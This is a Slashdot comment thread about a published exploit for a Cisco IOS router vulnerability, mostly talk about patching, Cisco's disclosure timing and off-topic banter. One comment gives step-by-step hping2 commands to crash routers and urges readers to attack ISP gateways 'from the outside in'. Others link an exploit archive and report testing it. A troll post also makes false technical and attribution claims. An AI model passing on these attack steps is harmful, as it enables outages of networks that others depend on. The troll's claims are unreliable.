Exploit Available for Cisco IOS Vulnerability

GNUman writes "Cisco's IOS vulnerability, posted by Slashdot and CERT, has now a published exploit available, as reported recently by CERT. While there are some some articles claiming that the Internet survived a major flaw, maybe with a publicly available exploit could script kiddies start creating havock?. jerw134 wanted to start a pool to find out when the exploit would be publicly available, here's the answer."

Great...

[mfifer]

...the 'sploit is more easily available than the fix!

Anyone else gone through hell today trying to get the patch from Cisco?

Grrr... >-/

Re:Great...

[silas_moeckel]

Well I havent had any issues just go login to your CCO account and grab the new IOS's actualy my local mirror updated yesterday automaticaly. As for going through TAC thats allways a PITA to say a couple hundred dollars a year.

Exploits et al.,

[Jack+Wagner]

This is something that is such a black plague on the IT industry and it just amazes me that we're supposed to take it in stride. The problem here is that we continue to use tools that are not mature.

During these difficult economic times I've had to branch out and do some "web programming" along with my real programming contract work (mostly low level 4Q multi-threaded kernel hacking, etc.) and after doing some cursory studying and testing of various techniques I'm amazed at how badly most of the sites on the web are designed and how most of them use the wrong tool for the job.

For instance I was able to reduce the load time of a very well known and heavily traveled Fortune 500 website by moving all the graphics to black and white only, as they load on an average of Olog(n) faster than color graphics (where n is the number of pixels in the color graphic) thusly improving their UHCRF (unique hit customer retention factor) ratio by 35%!! I won't brag about the $10,000 bonus check I received from hitting that benchmark... heh. Other simple techniques like removing all interpreted languages (java, Visual Basic, c# etc.) and replacing them with low level compiled code (C, of course) has generated speed increases upwards of 25% and also increase the security of the site as a side effect.

It's a shame we don't teach IT people to spend some time to learn their trade inside and out instead of always forcing them to jump on the "flavour of the month" and use abstracted high level tools. As Leon Brooks sums it up in his famous book "The Mythical Man Month" - You'll never properly solve a programming problem by using tools that are not mature. Leon hit's the nail right on the head with that one.

Warmest regards,
--Jack

Re:Exploits et al.,

[Burlynerd]

You're right on the money with the "maturity" comments, Jack. The way technology has been running, we have been in a constant state of trying to learn something new. We've never really had a chance to get "really good" at some of our technologies, before the next version or replacement technology arrived.

The Cisco situation is not due to bleeding edge issues though. They should have found this problem sooner.

Re:Exploits et al.,

[gabriel-dialupusa]

It's also a shame we have to pat ourselves on the back a lot on slashdot. And as long as you're not bragging about $10k bonuses, make sure to not tell us how you didn't spend it on the EFF and FSF. ;-)

Re:Exploits et al.,

[aliens]

What kind of graphics were these? They should have been already optimized to allow for quick loading.

Unless you're talking about high quality TIF's B&W vs. Color should not be making a difference in your load times.

tried it... works quite well

I've already compiled this and tested against an internal router, fills up the input queue quite nicely. Requires libnet.h

-orbit0r

Is this a problem of feature inflation?

[CraigV]

I had the impression that routing was a fairly straight-forward task and that 100% reliable software should be available for the routers. Has Cisco added frills to such an extent that the basic routing is compromised? Is this current problem associated with unnecessary features?

Wanna check your routers?

[zdzichu]

Here the exploit: http://www.securitylab.ru/_tools/shadowchode.tar.t ar
It's .tar.gz file, incorrectly named.

Easy way to do it..

Here's how to take a router down:

Assuming you're using debian.

apt-get install hping2

ping

Subtract x in ttl=x from 255

then run:

hping2 -t -H 55 -d 128 -E /dev/urandom

enjoy...

and remember.. if you take down your ISPs gateway first you won't be able to do further damage.. start from the outside in.

Just how long has Cisco known about this?

[riaasucks]

If you look at the release dates of some of the code that is not vulnerable to this attack, it goes back to early June. To me, it looks like this was identified almost two months ago. The question then is: Was this suddenly announced once a planned mile-marker in IOS revisions had been met....or once they suspected the exploit was in the wild?

Re:The code

[njchick]

Why does the author put "(void)" before every fprintf()? Can it be some kind of hidden signature?

Re:Contact your network company

[Artifex]

After which they'll explain that they use Juniper equipment because it doesn't suck near as much as Cisco and you'll look like an ass

They may use Juniper routers, but if your contract with them includes their maintenance of CPE they provided for you, and the CPE is Cisco, you're still screwed, aren't you?